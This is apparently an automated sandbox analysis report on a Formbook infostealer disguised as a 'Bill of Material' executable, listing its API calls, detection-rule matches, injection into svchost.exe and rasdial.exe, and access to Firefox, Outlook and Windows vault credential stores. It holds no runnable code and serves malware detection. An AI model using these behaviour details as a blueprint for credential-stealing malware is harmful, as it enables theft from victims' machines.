            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_047A2C70
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2C60 NtCreateKey,LdrInitializeThunk,6_2_047A2C60
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_047A2CA0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_047A2D30
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_047A2D10
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_047A2DF0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2DD0 NtDelayExecution,LdrInitializeThunk,6_2_047A2DD0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_047A2EE0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_047A2E80
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2F30 NtCreateSection,LdrInitializeThunk,6_2_047A2F30
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2FE0 NtCreateFile,LdrInitializeThunk,6_2_047A2FE0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2FB0 NtResumeThread,LdrInitializeThunk,6_2_047A2FB0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2AF0 NtWriteFile,LdrInitializeThunk,6_2_047A2AF0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2AD0 NtReadFile,LdrInitializeThunk,6_2_047A2AD0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2B60 NtClose,LdrInitializeThunk,6_2_047A2B60
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_047A2BF0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2BE0 NtQueryValueKey,LdrInitializeThunk,6_2_047A2BE0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_047A2BA0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A35C0 NtCreateMutant,LdrInitializeThunk,6_2_047A35C0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A39B0 NtGetContextThread,LdrInitializeThunk,6_2_047A39B0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2C00 NtQueryInformationProcess,6_2_047A2C00
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2CF0 NtOpenProcess,6_2_047A2CF0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2CC0 NtQueryVirtualMemory,6_2_047A2CC0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2D00 NtSetInformationFile,6_2_047A2D00
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2DB0 NtEnumerateKey,6_2_047A2DB0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2E30 NtWriteVirtualMemory,6_2_047A2E30
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2EA0 NtAdjustPrivilegesToken,6_2_047A2EA0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2F60 NtCreateProcessEx,6_2_047A2F60
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2FA0 NtQuerySection,6_2_047A2FA0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2F90 NtProtectVirtualMemory,6_2_047A2F90
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2AB0 NtWaitForSingleObject,6_2_047A2AB0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A2B80 NtQueryInformationFile,6_2_047A2B80
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A3010 NtOpenDirectoryObject,6_2_047A3010
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A3090 NtSetValueKey,6_2_047A3090
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A3D70 NtOpenThread,6_2_047A3D70
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A3D10 NtOpenProcessToken,6_2_047A3D10
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_00828DA0 NtCreateFile,6_2_00828DA0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_00828FF0 NtDeleteFile,6_2_00828FF0
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_00828F00 NtReadFile,6_2_00828F00
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_00829090 NtClose,6_2_00829090
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_008291E0 NtAllocateVirtualMemory,6_2_008291E0
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0039D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0039D5EB
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00391201
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00391201
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0039E8F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047A5130 appears 58 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047EF290 appears 105 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047DEA12 appears 86 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0475B970 appears 280 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047B7E54 appears 111 times
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: String function: 00339CB3 appears 31 times
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: String function: 0034F9F2 appears 40 times
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: String function: 00350A30 appears 46 times
            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2188676129.000000000401D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Copy of 01. Bill of Material - 705.exe
            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176531629.0000000003E23000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Copy of 01. Bill of Material - 705.exe
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine	Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/14
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003A37B5 GetLastError,FormatMessageW, 0_2_003A37B5
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003910BF AdjustTokenPrivileges,CloseHandle, 0_2_003910BF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_003916C3
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_003A51CD
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_003BA67C
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_003A648E
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_003342A2
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	File created: C:\Users\user\AppData\Local\Temp\aut40FF.tmp
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe	File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002B02000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2710629422.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4642916283.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2712941703.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2710477193.0000000002AB3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Copy of 01. Bill of Material - 705.exe	ReversingLabs: Detection: 39%
            Source: Copy of 01. Bill of Material - 705.exe	Virustotal: Detection: 29%
            Source: unknown	Process created: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: version.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: version.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe	Section loaded: wininet.dll
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe	Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe	Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe	Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe	Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe	Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\rasdial.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Copy of 01. Bill of Material - 705.exe	Static file information: File size 1247232 > 1048576
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GQXHQykfhUHHi.exe, 00000004.00000002.4644705252.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4642079066.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Copy of 01. Bill of Material - 705.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003342DE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe	Code function: 0_2_00350A76 push ecx; ret 0_2_00350A89
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00414833 push ss; retf 2_2_00414842
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041389F push FFFFFFA4h; ret 2_2_004138AD
            Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00412100 push edi; iretd 2_2_00412101
